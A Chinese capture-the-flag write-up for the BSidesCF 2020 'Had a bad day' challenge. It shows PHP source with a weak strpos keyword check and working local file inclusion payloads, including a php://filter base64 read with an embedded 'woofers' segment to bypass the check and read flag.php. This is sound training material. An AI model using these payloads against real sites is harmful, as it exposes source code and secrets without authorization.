[BSidesCF 2020]Had a bad day

web第40题
[BSidesCF 2020]Had a bad day
打开靶场：

点击链接

发现有参数传递。考虑命令执行和sql注入的可能

尝试使用php://filter读取文件
原理介绍：php://filter 的使用
尝试读取index.php。发现报错

php://filter/read=convert.base64-encode/resource=index.php

根据提示信息，可能自动给文件加上了.php后缀，去掉自己写的文件后缀，再次尝试：

得到base64加密后的index.php文件的源码
解码得到index.php的源码：

				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

代码审计：
strpos() 函数查找字符串在另一字符串中第一次出现的位置（区分大小写）

就是说category参数的值必须包含woofers或者meowers或者index，否则不能读取
尝试payload:

?category=woofers/../flag

…/代表上一层目录，这样写后include会返回woofers的同级目录将flag.php文件包含进来

发现提示，说明flag.php被包含进来了
经过了解，发现php://filter中可以嵌套一层woofers用来绕过检测并且不会影响读取，payload:

?category=php://filter/read=convert.base64-encode/woofers/resource=flag